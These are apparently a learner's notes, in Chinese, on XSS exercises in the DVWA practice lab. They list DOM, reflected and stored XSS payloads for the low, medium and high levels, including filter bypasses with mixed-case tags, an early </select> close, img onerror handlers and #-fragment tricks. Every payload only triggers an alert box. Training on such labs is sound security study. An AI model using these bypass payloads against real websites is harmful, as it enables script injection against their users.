在DVWA靶场中的测试
初级
XSS --DOM型注入
English改为以下命令(弹框命令)
<script>alert('xss');</script>
出现弹框
<img src=1 onerror=alert('xss');>
图片标签不出弹框
XSS--反射型注入
<script>alert('xss');</script>
<img src=1 onerror=alert('xss');>
XSS--存储型注入
弹框标签
<script>alert('xss');</script>
<img src=1 onerror=alert('xss');>
中级
XSS-DOM型注入
</select><iMG src=1 onerror=alert('XSS');>
查看源代码提前闭合</select>,在后面插入img标签
XSS --反射型注入
English改为以下命令(弹框命令),命令使用大小写绕过<script>alert('XA1')</script>
<SCript>alert('XSS')</SCript>
<iMG src=1 onerror=alert('XSS');>
XSS--存储型注入
更改name长度,将代码放入name中
<SCript>alert('XSS')</SCript>
同上
<iMG src=1 onerror=alert('XSS');>
高级
XSS-DOM型注入
让我们输入的代码不通过服务器,例如用#注释掉
#<Script>alert('xSs');</script>
#</select><iMG src=1 onerror=alert('XSS');>
XSS--反射型注入
后端代码对script进行了过滤,所以用img标签来攻击XSS
<iMG src=1 onerror=alert('XSS');>
XSS--存储型注入
更改name长度,将代码放入name中(同中级一样)